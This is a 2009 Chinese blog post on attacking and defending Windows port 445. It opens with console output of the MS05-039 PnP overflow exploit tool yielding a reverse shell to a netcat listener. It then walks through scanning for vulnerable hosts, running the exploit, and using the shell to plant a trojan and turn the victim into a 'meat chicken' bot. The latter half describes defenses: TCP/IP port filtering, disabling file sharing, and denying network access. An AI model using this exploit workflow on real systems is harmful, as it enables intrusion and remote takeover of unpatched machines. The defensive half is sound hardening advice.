十二
19
2009
2

445端口入侵

C:\445>ms05039.exe 192.168.0.13 192.168.0.11 1234 1

MS05-039 Windows PnP Remote Overflow Exploit

Connect back shellcode Edition By superlone[EST]

Tested On Windows 2000 PRO SP4 CN

[+] Trying to connect to remote port on192.168.0.13:445…ESTABLISHED
[+] Making null session…OK
[+]Trying to bind pipe…OK

  • Tring to send crafted packet…OK
    [+]Exploit done!Check your reverse shell on 192.168.0.11:1234

    • C:\445>nc.exe -vv -l -p 1234
    listening on [any] 1234 …

  • 教会你445端口的攻击与防范:
    445 端口是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口 偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!我们所能做的就是想办法不让黑客有机可乘,封堵住445端口漏洞。简单起见,本文中都以Windows 2000为例,对于Windows XP,步骤基本类似。

    • 第一步,我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到!比如SUPERSCAN这个端口扫描工具。

    第二步,假设现在我们已经得到一台存在445端口漏洞的主机,那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击:
    F:\445>ms05039 目标IP 本地IP 1234
    。。。 。。。
    。。。 。。。

    F:\445>nc.exe -vv -l -p 1234
    。。。 。。。
    。。。 。。。

    成功的话,就会返回一个shell,然后就可以用我们常用的命令了。比如让他去下载我们的木马或上传一个木马给他,然后运行,这样得到一只肉鸡了。

    看了上面的这些,是不是觉得自己的电脑很危险?不用怕,下面我们就来解除这危险的445端口漏洞:

    防范445端口漏洞的攻击方法:
    1.端口排除法
    这种方法利用了Windows 2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉,让“大

    恶人”们无法接近你的主机,下面是这种方法的具体实现步骤:

    打开Windows 2000系统的开始菜单,选中“设置”项下面的“网络和拨号连接”图标,并用鼠标右键单击之,从其后的快捷菜单中,单击“浏览”命令;

    在接着出现的窗口中,右击“Internet连接”图标,选中“属性”选项,弹出Internet连接属性窗口;

    打开“常规”标签页面,将其中的“Internet协议(TCP/IP)”项选中,然后再单击一下“属性”按钮,打开Internet协议(TCP/IP)属性设置页面;

    继续单击该页面中的“高级”按钮,打开高级TCP/IP设置窗口,选中其中的“选项”标签,并在该标签页面的“可选的设置”项中,将“TCP/IP筛选”选中,再单击一下对应的“属性”按钮,打开TCP/IP筛选的设置口;

    由 于445端口属于一种TCP端口,你可以在对应“TCP端口”的设置项处,将“只允许”项选中,激活下面的“添加”按钮,单击该按钮,在其后打开的“添加 筛选器”窗口中,将必须用到的几个服务端口号码,都添加进来,而将用不到的445端口号码排除在外,设置完毕后,单击“确定”按钮,就可以让设置生效了。

    2.服务关闭法

    考虑到文件夹或打印机共享服务才会利用到445端口,因此直接将文件夹或打印机共享服务停止掉,同样也能实现关闭445端口的目的,让黑客无法破坏各种共享资源,下面是关闭文件夹或打印机共享服务的具体步骤:

    打开Windows 2000系统的开始菜单,选中“设置”项下面的“网络和拨号连接”图标,并用鼠标右键单击之,从其后的快捷菜单中,单击“浏览”命令;

    在接着出现的窗口中,右击“Internet连接”图标,选中“属性”选项,弹出Internet连接属性窗口;

    打开“常规”标签页面,并在“此连接使用下列选定的组件”列表框中,将“Microsoft网络的文件或打印机共享”选项前面的勾号取消,如图2所示。最后单击“确定”按钮,重新启动系统,Internet上的“大恶人”们就没有权利访问到各种共享资源了。

    当然,你也可以在不停止共享服务的条件下,剥夺“大恶人”们的共享访问权利;利用本地安全设置中的“用户权利指派”功能,指定Internet上的任何用户都无权访问本地主机,具体步骤为:

    Windows 2000系统的开始菜单中,依次单击“程序” “管理工具” “本地安全设置”选项,接着展开“安全设置” “本地策略” “用户权利指派”文件夹,在对应的右边子窗口中选中“拒绝从网络访问这台计算机”选项,并用鼠标左键双击之;

    打开设置窗口后,单击“添加”按钮,从弹出的“选择用户或组”对话框中选中“everyone”选项,再单击“添加”按钮,最后单击“确定”,这样任何一位用户都无法从网络访问到本地主机。

    Written by xuanxuan in: 黑帮技术 | 标签:

    Powered by WordPress | Copyright (c) 2009-2010 qsdiy.net All rights reserved. | blog rss